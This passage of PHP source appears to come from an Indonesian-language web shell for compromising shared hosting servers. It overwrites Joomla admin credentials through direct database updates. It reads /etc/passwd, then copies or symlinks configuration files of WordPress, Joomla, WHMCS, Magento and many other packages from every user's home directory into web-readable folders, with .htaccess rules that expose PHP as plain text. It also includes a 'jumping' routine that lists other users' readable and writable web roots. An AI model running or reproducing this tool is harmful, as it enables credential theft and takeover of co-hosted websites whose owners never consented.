  1496. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1497. $prefix = $dbprefix."users";
  1498. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1499. $db = mysql_select_db($dbname);
  1500. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1501. $result = mysql_fetch_array($q);
  1502. $id = $result['id'];
  1503. $site = ambilkata($config,"sitename = '","'");
  1504. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1505. echo "Config => ".$dir_config."<br>";
  1506. echo "CMS => Joomla<br>";
  1507. if($site == '') {
  1508. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1509. } else {
  1510. echo "Sitename => $site<br>";
  1511. }
  1512. if(!$update OR !$conn OR !$db) {
  1513. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1514. } else {
  1515. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1516. }
  1517. mysql_close($conn);
  1518. }
  1519. }
  1520. } elseif($_GET['config'] == 'grabber') {
  1521. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1522. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  1523. exit;
  1524. }
  1525. if($_POST){ if($_POST['config'] == 'symvhosts') {
  1526. @mkdir("symvhosts", 0777);
  1527. exe("ln -s / symvhosts/root");
  1528. $htaccess="Options Indexes FollowSymLinks
  1529. DirectoryIndex tokeichun69.htm
  1530. AddType text/plain .php
  1531. AddHandler text/plain .php
  1532. Satisfy Any";
  1533. @file_put_contents("symvhosts/.htaccess",$htaccess);
  1534. $etc_passwd=$_POST['passwd'];
  1535.  
  1536. $etc_passwd=explode("\n",$etc_passwd);
  1537. foreach($etc_passwd as $passwd){
  1538. $pawd=explode(":",$passwd);
  1539. $user =$pawd[5];
  1540. $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  1541. if (preg_match('/vhosts/i',$user)){
  1542. exe("ln -s ".$user."/httpdocs/wp-config.php symvhosts/".$jembod."-Wordpress.txt");
  1543. exe("ln -s ".$user."/httpdocs/configuration.php symvhosts/".$jembod."-Joomla.txt");
  1544. exe("ln -s ".$user."/httpdocs/config/koneksi.php symvhosts/".$jembod."-Lokomedia.txt");
  1545. exe("ln -s ".$user."/httpdocs/forum/config.php symvhosts/".$jembod."-phpBB.txt");
  1546. exe("ln -s ".$user."/httpdocs/sites/default/settings.php symvhosts/".$jembod."-Drupal.txt");
  1547. exe("ln -s ".$user."/httpdocs/config/settings.inc.php symvhosts/".$jembod."-PrestaShop.txt");
  1548. exe("ln -s ".$user."/httpdocs/app/etc/local.xml symvhosts/".$jembod."-Magento.txt");
  1549. exe("ln -s ".$user."/httpdocs/admin/config.php symvhosts/".$jembod."-OpenCart.txt");
  1550. exe("ln -s ".$user."/httpdocs/application/config/database.php symvhosts/".$jembod."-Ellislab.txt");
  1551. }}}
  1552. if($_POST['config'] == 'symlink') {
  1553. @mkdir("symconfig", 0777);
  1554. @symlink("/","symconfig/root");
  1555. $htaccess="Options Indexes FollowSymLinks
  1556. DirectoryIndex tokeichun69.htm
  1557. AddType text/plain .php
  1558. AddHandler text/plain .php
  1559. Satisfy Any";
  1560. @file_put_contents("symconfig/.htaccess",$htaccess);}
  1561. if($_POST['config'] == '404') {
  1562. @mkdir("sym404", 0777);
  1563. @symlink("/","sym404/root");
  1564. $htaccess="Options Indexes FollowSymLinks
  1565. DirectoryIndex tokeichun69.htm
  1566. AddType text/plain .php
  1567. AddHandler text/plain .php
  1568. Satisfy Any
  1569. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  1570. IndexIgnore *.txt404
  1571. RewriteEngine On
  1572. RewriteCond %{REQUEST_FILENAME} ^.*sym404 [NC]
  1573. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  1574. @file_put_contents("sym404/.htaccess",$htaccess);
  1575. }
  1576. if($_POST['config'] == 'grab') {
  1577. mkdir("configg", 0777);
  1578. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1579. $htc = fopen("configg/.htaccess","w");
  1580. fwrite($htc, $isi_htc);
  1581. }
  1582. $passwd = $_POST['passwd'];
  1583.  
  1584. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1585. foreach($user_config[1] as $user_tokeichun) {
  1586. $grab_config = array(
  1587. "/home/$user_tokeichun/.accesshash" => "WHM-accesshash",
  1588. "/home/$user_tokeichun/public_html/config/koneksi.php" => "Lokomedia",
  1589. "/home/$user_tokeichun/public_html/forum/config.php" => "phpBB",
  1590. "/home/$user_tokeichun/public_html/sites/default/settings.php" => "Drupal",
  1591. "/home/$user_tokeichun/public_html/config/settings.inc.php" => "PrestaShop",
  1592. "/home/$user_tokeichun/public_html/app/etc/local.xml" => "Magento",
  1593. "/home/$user_tokeichun/public_html/admin/config.php" => "OpenCart",
  1594. "/home/$user_tokeichun/public_html/application/config/database.php" => "Ellislab",
  1595. "/home/$user_tokeichun/public_html/vb/includes/config.php" => "Vbulletin",
  1596. "/home/$user_tokeichun/public_html/includes/config.php" => "Vbulletin",
  1597. "/home/$user_tokeichun/public_html/forum/includes/config.php" => "Vbulletin",
  1598. "/home/$user_tokeichun/public_html/forums/includes/config.php" => "Vbulletin",
  1599. "/home/$user_tokeichun/public_html/cc/includes/config.php" => "Vbulletin",
  1600. "/home/$user_tokeichun/public_html/inc/config.php" => "MyBB",
  1601. "/home/$user_tokeichun/public_html/includes/configure.php" => "OsCommerce",
  1602. "/home/$user_tokeichun/public_html/shop/includes/configure.php" => "OsCommerce",
  1603. "/home/$user_tokeichun/public_html/os/includes/configure.php" => "OsCommerce",
  1604. "/home/$user_tokeichun/public_html/oscom/includes/configure.php" => "OsCommerce",
  1605. "/home/$user_tokeichun/public_html/products/includes/configure.php" => "OsCommerce",
  1606. "/home/$user_tokeichun/public_html/cart/includes/configure.php" => "OsCommerce",
  1607. "/home/$user_tokeichun/public_html/inc/conf_global.php" => "IPB",
  1608. "/home/$user_tokeichun/public_html/wp-config.php" => "Wordpress",
  1609. "/home/$user_tokeichun/public_html/wp/test/wp-config.php" => "Wordpress",
  1610. "/home/$user_tokeichun/public_html/blog/wp-config.php" => "Wordpress",
  1611. "/home/$user_tokeichun/public_html/beta/wp-config.php" => "Wordpress",
  1612. "/home/$user_tokeichun/public_html/portal/wp-config.php" => "Wordpress",
  1613. "/home/$user_tokeichun/public_html/site/wp-config.php" => "Wordpress",
  1614. "/home/$user_tokeichun/public_html/wp/wp-config.php" => "Wordpress",
  1615. "/home/$user_tokeichun/public_html/WP/wp-config.php" => "Wordpress",
  1616. "/home/$user_tokeichun/public_html/news/wp-config.php" => "Wordpress",
  1617. "/home/$user_tokeichun/public_html/wordpress/wp-config.php" => "Wordpress",
  1618. "/home/$user_tokeichun/public_html/test/wp-config.php" => "Wordpress",
  1619. "/home/$user_tokeichun/public_html/demo/wp-config.php" => "Wordpress",
  1620. "/home/$user_tokeichun/public_html/home/wp-config.php" => "Wordpress",
  1621. "/home/$user_tokeichun/public_html/v1/wp-config.php" => "Wordpress",
  1622. "/home/$user_tokeichun/public_html/v2/wp-config.php" => "Wordpress",
  1623. "/home/$user_tokeichun/public_html/press/wp-config.php" => "Wordpress",
  1624. "/home/$user_tokeichun/public_html/new/wp-config.php" => "Wordpress",
  1625. "/home/$user_tokeichun/public_html/blogs/wp-config.php" => "Wordpress",
  1626. "/home/$user_tokeichun/public_html/configuration.php" => "Joomla",
  1627. "/home/$user_tokeichun/public_html/blog/configuration.php" => "Joomla",
  1628. "/home/$user_tokeichun/public_html/submitticket.php" => "^WHMCS",
  1629. "/home/$user_tokeichun/public_html/cms/configuration.php" => "Joomla",
  1630. "/home/$user_tokeichun/public_html/beta/configuration.php" => "Joomla",
  1631. "/home/$user_tokeichun/public_html/portal/configuration.php" => "Joomla",
  1632. "/home/$user_tokeichun/public_html/site/configuration.php" => "Joomla",
  1633. "/home/$user_tokeichun/public_html/main/configuration.php" => "Joomla",
  1634. "/home/$user_tokeichun/public_html/home/configuration.php" => "Joomla",
  1635. "/home/$user_tokeichun/public_html/demo/configuration.php" => "Joomla",
  1636. "/home/$user_tokeichun/public_html/test/configuration.php" => "Joomla",
  1637. "/home/$user_tokeichun/public_html/v1/configuration.php" => "Joomla",
  1638. "/home/$user_tokeichun/public_html/v2/configuration.php" => "Joomla",
  1639. "/home/$user_tokeichun/public_html/joomla/configuration.php" => "Joomla",
  1640. "/home/$user_tokeichun/public_html/new/configuration.php" => "Joomla",
  1641. "/home/$user_tokeichun/public_html/WHMCS/submitticket.php" => "WHMCS",
  1642. "/home/$user_tokeichun/public_html/whmcs1/submitticket.php" => "WHMCS",
  1643. "/home/$user_tokeichun/public_html/Whmcs/submitticket.php" => "WHMCS",
  1644. "/home/$user_tokeichun/public_html/whmcs/submitticket.php" => "WHMCS",
  1645. "/home/$user_tokeichun/public_html/whmcs/submitticket.php" => "WHMCS",
  1646. "/home/$user_tokeichun/public_html/WHMC/submitticket.php" => "WHMCS",
  1647. "/home/$user_tokeichun/public_html/Whmc/submitticket.php" => "WHMCS",
  1648. "/home/$user_tokeichun/public_html/whmc/submitticket.php" => "WHMCS",
  1649. "/home/$user_tokeichun/public_html/WHM/submitticket.php" => "WHMCS",
  1650. "/home/$user_tokeichun/public_html/Whm/submitticket.php" => "WHMCS",
  1651. "/home/$user_tokeichun/public_html/whm/submitticket.php" => "WHMCS",
  1652. "/home/$user_tokeichun/public_html/HOST/submitticket.php" => "WHMCS",
  1653. "/home/$user_tokeichun/public_html/Host/submitticket.php" => "WHMCS",
  1654. "/home/$user_tokeichun/public_html/host/submitticket.php" => "WHMCS",
  1655. "/home/$user_tokeichun/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1656. "/home/$user_tokeichun/public_html/Supportes/submitticket.php" => "WHMCS",
  1657. "/home/$user_tokeichun/public_html/supportes/submitticket.php" => "WHMCS",
  1658. "/home/$user_tokeichun/public_html/domains/submitticket.php" => "WHMCS",
  1659. "/home/$user_tokeichun/public_html/domain/submitticket.php" => "WHMCS",
  1660. "/home/$user_tokeichun/public_html/Hosting/submitticket.php" => "WHMCS",
  1661. "/home/$user_tokeichun/public_html/HOSTING/submitticket.php" => "WHMCS",
  1662. "/home/$user_tokeichun/public_html/hosting/submitticket.php" => "WHMCS",
  1663. "/home/$user_tokeichun/public_html/CART/submitticket.php" => "WHMCS",
  1664. "/home/$user_tokeichun/public_html/Cart/submitticket.php" => "WHMCS",
  1665. "/home/$user_tokeichun/public_html/cart/submitticket.php" => "WHMCS",
  1666. "/home/$user_tokeichun/public_html/ORDER/submitticket.php" => "WHMCS",
  1667. "/home/$user_tokeichun/public_html/Order/submitticket.php" => "WHMCS",
  1668. "/home/$user_tokeichun/public_html/order/submitticket.php" => "WHMCS",
  1669. "/home/$user_tokeichun/public_html/CLIENT/submitticket.php" => "WHMCS",
  1670. "/home/$user_tokeichun/public_html/Client/submitticket.php" => "WHMCS",
  1671. "/home/$user_tokeichun/public_html/client/submitticket.php" => "WHMCS",
  1672. "/home/$user_tokeichun/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1673. "/home/$user_tokeichun/public_html/Clientarea/submitticket.php" => "WHMCS",
  1674. "/home/$user_tokeichun/public_html/clientarea/submitticket.php" => "WHMCS",
  1675. "/home/$user_tokeichun/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1676. "/home/$user_tokeichun/public_html/Support/submitticket.php" => "WHMCS",
  1677. "/home/$user_tokeichun/public_html/support/submitticket.php" => "WHMCS",
  1678. "/home/$user_tokeichun/public_html/BILLING/submitticket.php" => "WHMCS",
  1679. "/home/$user_tokeichun/public_html/Billing/submitticket.php" => "WHMCS",
  1680. "/home/$user_tokeichun/public_html/billing/submitticket.php" => "WHMCS",
  1681. "/home/$user_tokeichun/public_html/BUY/submitticket.php" => "WHMCS",
  1682. "/home/$user_tokeichun/public_html/Buy/submitticket.php" => "WHMCS",
  1683. "/home/$user_tokeichun/public_html/buy/submitticket.php" => "WHMCS",
  1684. "/home/$user_tokeichun/public_html/MANAGE/submitticket.php" => "WHMCS",
  1685. "/home/$user_tokeichun/public_html/Manage/submitticket.php" => "WHMCS",
  1686. "/home/$user_tokeichun/public_html/manage/submitticket.php" => "WHMCS",
  1687. "/home/$user_tokeichun/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1688. "/home/$user_tokeichun/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1689. "/home/$user_tokeichun/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1690. "/home/$user_tokeichun/public_html/clientsupport/submitticket.php" => "WHMCS",
  1691. "/home/$user_tokeichun/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1692. "/home/$user_tokeichun/public_html/Checkout/submitticket.php" => "WHMCS",
  1693. "/home/$user_tokeichun/public_html/checkout/submitticket.php" => "WHMCS",
  1694. "/home/$user_tokeichun/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1695. "/home/$user_tokeichun/public_html/Billings/submitticket.php" => "WHMCS",
  1696. "/home/$user_tokeichun/public_html/billings/submitticket.php" => "WHMCS",
  1697. "/home/$user_tokeichun/public_html/BASKET/submitticket.php" => "WHMCS",
  1698. "/home/$user_tokeichun/public_html/Basket/submitticket.php" => "WHMCS",
  1699. "/home/$user_tokeichun/public_html/basket/submitticket.php" => "WHMCS",
  1700. "/home/$user_tokeichun/public_html/SECURE/submitticket.php" => "WHMCS",
  1701. "/home/$user_tokeichun/public_html/Secure/submitticket.php" => "WHMCS",
  1702. "/home/$user_tokeichun/public_html/secure/submitticket.php" => "WHMCS",
  1703. "/home/$user_tokeichun/public_html/SALES/submitticket.php" => "WHMCS",
  1704. "/home/$user_tokeichun/public_html/Sales/submitticket.php" => "WHMCS",
  1705. "/home/$user_tokeichun/public_html/sales/submitticket.php" => "WHMCS",
  1706. "/home/$user_tokeichun/public_html/BILL/submitticket.php" => "WHMCS",
  1707. "/home/$user_tokeichun/public_html/Bill/submitticket.php" => "WHMCS",
  1708. "/home/$user_tokeichun/public_html/bill/submitticket.php" => "WHMCS",
  1709. "/home/$user_tokeichun/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1710. "/home/$user_tokeichun/public_html/Purchase/submitticket.php" => "WHMCS",
  1711. "/home/$user_tokeichun/public_html/purchase/submitticket.php" => "WHMCS",
  1712. "/home/$user_tokeichun/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1713. "/home/$user_tokeichun/public_html/Account/submitticket.php" => "WHMCS",
  1714. "/home/$user_tokeichun/public_html/account/submitticket.php" => "WHMCS",
  1715. "/home/$user_tokeichun/public_html/USER/submitticket.php" => "WHMCS",
  1716. "/home/$user_tokeichun/public_html/User/submitticket.php" => "WHMCS",
  1717. "/home/$user_tokeichun/public_html/user/submitticket.php" => "WHMCS",
  1718. "/home/$user_tokeichun/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1719. "/home/$user_tokeichun/public_html/Clients/submitticket.php" => "WHMCS",
  1720. "/home/$user_tokeichun/public_html/clients/submitticket.php" => "WHMCS",
  1721. "/home/$user_tokeichun/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1722. "/home/$user_tokeichun/public_html/Billings/submitticket.php" => "WHMCS",
  1723. "/home/$user_tokeichun/public_html/billings/submitticket.php" => "WHMCS",
  1724. "/home/$user_tokeichun/public_html/MY/submitticket.php" => "WHMCS",
  1725. "/home/$user_tokeichun/public_html/My/submitticket.php" => "WHMCS",
  1726. "/home/$user_tokeichun/public_html/my/submitticket.php" => "WHMCS",
  1727. "/home/$user_tokeichun/public_html/secure/whm/submitticket.php" => "WHMCS",
  1728. "/home/$user_tokeichun/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1729. "/home/$user_tokeichun/public_html/panel/submitticket.php" => "WHMCS",
  1730. "/home/$user_tokeichun/public_html/clientes/submitticket.php" => "WHMCS",
  1731. "/home/$user_tokeichun/public_html/cliente/submitticket.php" => "WHMCS",
  1732. "/home/$user_tokeichun/public_html/support/order/submitticket.php" => "WHMCS",
  1733. "/home/$user_tokeichun/public_html/bb-config.php" => "BoxBilling",
  1734. "/home/$user_tokeichun/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1735. "/home/$user_tokeichun/public_html/box/bb-config.php" => "BoxBilling",
  1736. "/home/$user_tokeichun/public_html/host/bb-config.php" => "BoxBilling",
  1737. "/home/$user_tokeichun/public_html/Host/bb-config.php" => "BoxBilling",
  1738. "/home/$user_tokeichun/public_html/supportes/bb-config.php" => "BoxBilling",
  1739. "/home/$user_tokeichun/public_html/support/bb-config.php" => "BoxBilling",
  1740. "/home/$user_tokeichun/public_html/hosting/bb-config.php" => "BoxBilling",
  1741. "/home/$user_tokeichun/public_html/cart/bb-config.php" => "BoxBilling",
  1742. "/home/$user_tokeichun/public_html/order/bb-config.php" => "BoxBilling",
  1743. "/home/$user_tokeichun/public_html/client/bb-config.php" => "BoxBilling",
  1744. "/home/$user_tokeichun/public_html/clients/bb-config.php" => "BoxBilling",
  1745. "/home/$user_tokeichun/public_html/cliente/bb-config.php" => "BoxBilling",
  1746. "/home/$user_tokeichun/public_html/clientes/bb-config.php" => "BoxBilling",
  1747. "/home/$user_tokeichun/public_html/billing/bb-config.php" => "BoxBilling",
  1748. "/home/$user_tokeichun/public_html/billings/bb-config.php" => "BoxBilling",
  1749. "/home/$user_tokeichun/public_html/my/bb-config.php" => "BoxBilling",
  1750. "/home/$user_tokeichun/public_html/secure/bb-config.php" => "BoxBilling",
  1751. "/home/$user_tokeichun/public_html/support/order/bb-config.php" => "BoxBilling",
  1752. "/home/$user_tokeichun/public_html/includes/dist-configure.php" => "Zencart",
  1753. "/home/$user_tokeichun/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1754. "/home/$user_tokeichun/public_html/products/includes/dist-configure.php" => "Zencart",
  1755. "/home/$user_tokeichun/public_html/cart/includes/dist-configure.php" => "Zencart",
  1756. "/home/$user_tokeichun/public_html/shop/includes/dist-configure.php" => "Zencart",
  1757. "/home/$user_tokeichun/public_html/includes/iso4217.php" => "Hostbills",
  1758. "/home/$user_tokeichun/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1759. "/home/$user_tokeichun/public_html/host/includes/iso4217.php" => "Hostbills",
  1760. "/home/$user_tokeichun/public_html/Host/includes/iso4217.php" => "Hostbills",
  1761. "/home/$user_tokeichun/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1762. "/home/$user_tokeichun/public_html/support/includes/iso4217.php" => "Hostbills",
  1763. "/home/$user_tokeichun/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1764. "/home/$user_tokeichun/public_html/cart/includes/iso4217.php" => "Hostbills",
  1765. "/home/$user_tokeichun/public_html/order/includes/iso4217.php" => "Hostbills",
  1766. "/home/$user_tokeichun/public_html/client/includes/iso4217.php" => "Hostbills",
  1767. "/home/$user_tokeichun/public_html/clients/includes/iso4217.php" => "Hostbills",
  1768. "/home/$user_tokeichun/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1769. "/home/$user_tokeichun/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1770. "/home/$user_tokeichun/public_html/billing/includes/iso4217.php" => "Hostbills",
  1771. "/home/$user_tokeichun/public_html/billings/includes/iso4217.php" => "Hostbills",
  1772. "/home/$user_tokeichun/public_html/my/includes/iso4217.php" => "Hostbills",
  1773. "/home/$user_tokeichun/public_html/secure/includes/iso4217.php" => "Hostbills",
  1774. "/home/$user_tokeichun/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1775. );
  1776.  
  1777. foreach($grab_config as $config => $nama_config) {
  1778. if($_POST['config'] == 'grab') {
  1779. $ambil_config = file_get_contents($config);
  1780. if($ambil_config == '') {
  1781. } else {
  1782. $file_config = fopen("configg/$user_tokeichun-$nama_config.txt","w");
  1783. fputs($file_config,$ambil_config);
  1784. }
  1785. }
  1786. if($_POST['config'] == 'symlink') {
  1787. @symlink($config,"symconfig/".$user_tokeichun."-".$nama_config.".txt");
  1788. }
  1789. if($_POST['config'] == '404') {
  1790. $sym404=symlink($config,"sym404/".$user_tokeichun."-".$nama_config.".txt");
  1791. if($sym404){
  1792. @mkdir("sym404/".$user_tokeichun."-".$nama_config.".txt404", 0777);
  1793. $htaccess="Options Indexes FollowSymLinks
  1794. DirectoryIndex tokeichun.htm
  1795. HeaderName tokeichun.txt
  1796. Satisfy Any
  1797. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1798. IndexIgnore *";
  1799.  
  1800. @file_put_contents("sym404/".$user_tokeichun."-".$nama_config.".txt404/.htaccess",$htaccess);
  1801.  
  1802. @symlink($config,"sym404/".$user_tokeichun."-".$nama_config.".txt404/tokeichun.txt");
  1803.  
  1804. }
  1805.  
  1806. }
  1807.  
  1808. }
  1809. } if($_POST['config'] == 'grab') {
  1810. echo "<center><a href='?dir=$dir/configg'><font color=lime>Done</font></a></center>";
  1811. }
  1812. if($_POST['config'] == '404') {
  1813. echo "<center>
  1814. <a href=\"sym404/root/\">SymlinkNya</a>
  1815. <br><a href=\"sym404/\">Configurations</a></center>";
  1816. }
  1817. if($_POST['config'] == 'symlink') {
  1818. echo "<center>
  1819. <a href=\"symconfig/root/\">Symlinknya</a>
  1820. <br><a href=\"symconfig/\">Configurations</a></center>";
  1821. }if($_POST['config'] == 'symvhost') {
  1822. echo "<center>
  1823. <a href=\"symvhost/root/\">Root Server</a>
  1824. <br><a href=\"symvhost/\">Configurations</a></center>";
  1825. }
  1826.  
  1827.  
  1828. }else{
  1829. echo "<form method=\"post\" action=\"\"><center>
  1830. </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1831. echo include("/etc/passwd");
  1832. echo "</textarea><br><br>
  1833. <select class=\"select\" name=\"config\" style=\"width: 450px;\" height=\"10\">
  1834. <option value=\"grab\">Config Grab</option>
  1835. <option value=\"symlink\">Symlink Config</option>
  1836. <option value=\"404\">Config 404</option>
  1837. <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Start!!\"></td></tr></center>\n";
  1838. }
  1839. }
  1840. elseif($_GET['do'] == 'symlink') {
  1841. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1842. $d0mains = @file("/etc/named.conf");
  1843. ##httaces
  1844. if($d0mains){
  1845. @mkdir("scripts",0777);
  1846. @chdir("scripts");
  1847. @exe("ln -s / root");
  1848. $file3 = 'Options Indexes FollowSymLinks
  1849. DirectoryIndex tokeichun.html
  1850. AddType text/plain .php
  1851. AddHandler text/plain .php
  1852. Satisfy Any';
  1853. $fp3 = fopen('.htaccess','w');
  1854. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1855. echo "
  1856. <table align=center border=1 style='width:60%;border-color:#333333;'>
  1857. <tr>
  1858. <td align=center><font size=2>S. No.</font></td>
  1859. <td align=center><font size=2>Domains</font></td>
  1860. <td align=center><font size=2>Users</font></td>
  1861. <td align=center><font size=2>Symlink</font></td>
  1862. </tr>";
  1863. $dcount = 1;
  1864. foreach($d0mains as $d0main){
  1865. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1866. flush();
  1867. if(strlen(trim($domains[1][0])) > 2){
  1868. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1869. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1870. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1871. <td>".$user['name']."</td>
  1872. <td><a href='$full/scripts/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1873. flush();
  1874. $dcount++;}}}
  1875. echo "</table>";
  1876. }else{
  1877. $TEST=@file('/etc/passwd');
  1878. if ($TEST){
  1879. @mkdir("scripts",0777);
  1880. @chdir("scripts");
  1881. exe("ln -s / root");
  1882. $file3 = 'Options Indexes FollowSymLinks
  1883. DirectoryIndex tokeichun.html
  1884. AddType text/plain .php
  1885. AddHandler text/plain .php
  1886. Satisfy Any';
  1887. $fp3 = fopen('.htaccess','w');
  1888. $fw3 = fwrite($fp3,$file3);
  1889. @fclose($fp3);
  1890. echo "
  1891. <table align=center border=1><tr>
  1892. <td align=center><font size=3>S. No.</font></td>
  1893. <td align=center><font size=3>Users</font></td>
  1894. <td align=center><font size=3>Symlink</font></td></tr>";
  1895. $dcount = 1;
  1896. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1897. while(!feof($file)){
  1898. $s = fgets($file);
  1899. $matches = array();
  1900. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1901. $matches = str_replace("home/","",$matches[1]);
  1902. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1903. continue;
  1904. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1905. <td align=center><font class=txt>" . $matches . "</td>";
  1906. echo "<td align=center><font class=txt><a href=$full/scripts/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1907. $dcount++;}fclose($file);
  1908. echo "</table>";}else{if($os != "Windows"){@mkdir("scripts",0777);@chdir("scripts");@exe("ln -s / root");$file3 = '
  1909. Options Indexes FollowSymLinks
  1910. DirectoryIndex tokeichun.html
  1911. AddType text/plain .php
  1912. AddHandler text/plain .php
  1913. Satisfy Any
  1914. ';
  1915. $fp3 = fopen('.htaccess','w');
  1916. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1917. echo "
  1918. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1919. <table align=center border=1><tr>
  1920. <td align=center><font size=3>ID</font></td>
  1921. <td align=center><font size=3>Users</font></td>
  1922. <td align=center><font size=3>Symlink</font></td></tr>";
  1923. $temp = "";$val1 = 0;$val2 = 1000;
  1924. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1925. if ($uid)$temp .= join(':',$uid)."\n";}
  1926. echo '<br/>';$temp = trim($temp);$file5 =
  1927. fopen("test.txt","w");
  1928. fputs($file5,$temp);
  1929. fclose($file5);$dcount = 1;$file =
  1930. fopen("test.txt", "r") or exit("Unable to open file!");
  1931. while(!feof($file)){$s = fgets($file);$matches = array();
  1932. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1933. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1934. continue;
  1935. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1936. <td align=center><font class=txt>" . $matches . "</td>";
  1937. echo "<td align=center><font class=txt><a href=$full/scripts/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1938. $dcount++;}
  1939. fclose($file);
  1940. echo "</table></div></center>";unlink("test.txt");
  1941. } else
  1942. echo "<center><font size=3>Cannot create Symlink</font></center>";
  1943. }
  1944. }
  1945. }
  1946.  
  1947. elseif($_GET['do'] == 'jumping') {
  1948. $i = 0;
  1949. echo "<pre><div class='margin: 5px auto;'>";
  1950. $etc = fopen("/etc/passwd", "r");
  1951. while($passwd = fgets($etc)) {
  1952. if($passwd == '' || !$etc) {
  1953. echo "<font color=red>Can't read /etc/passwd</font>";
  1954. } else {
  1955. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1956. foreach($user_jumping[1] as $user_idx_jump) {
  1957. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1958. if(is_readable($user_jumping_dir)) {
  1959. $i++;
  1960. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1961. if(is_writable($user_jumping_dir)) {
  1962. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1963. }
  1964. echo $jrw;
  1965. $domain_jump = file_get_contents("/etc/named.conf");
  1966. if($domain_jump == '') {
  1967. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1968. } else {
  1969. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1970. foreach($domains_jump[1] as $dj) {
  1971. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1972. $user_jumping_url = $user_jumping_url['name'];
  1973. if($user_jumping_url == $user_idx_jump) {
  1974. echo " => ( <u>$dj</u> )<br>";
  1975. break;
  1976. }
  1977. }
  1978. }
  1979. }
  1980. }
  1981. }
  1982. }
  1983. if($i == 0) {
  1984. } else {
  1985. echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1986. }
  1987. echo "</div></pre>";
  1988.  
  1989. } elseif($_GET['do'] == 'auto_edit_user') {
  1990. if($_POST['hajar']) {
  1991. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1992. echo "username atau password harus lebih dari 6 karakter";
  1993. } else {
  1994. $user_baru = $_POST['user_baru'];
  1995. $pass_baru = md5($_POST['pass_baru']);
  1996. $conf = $_POST['config_dir'];
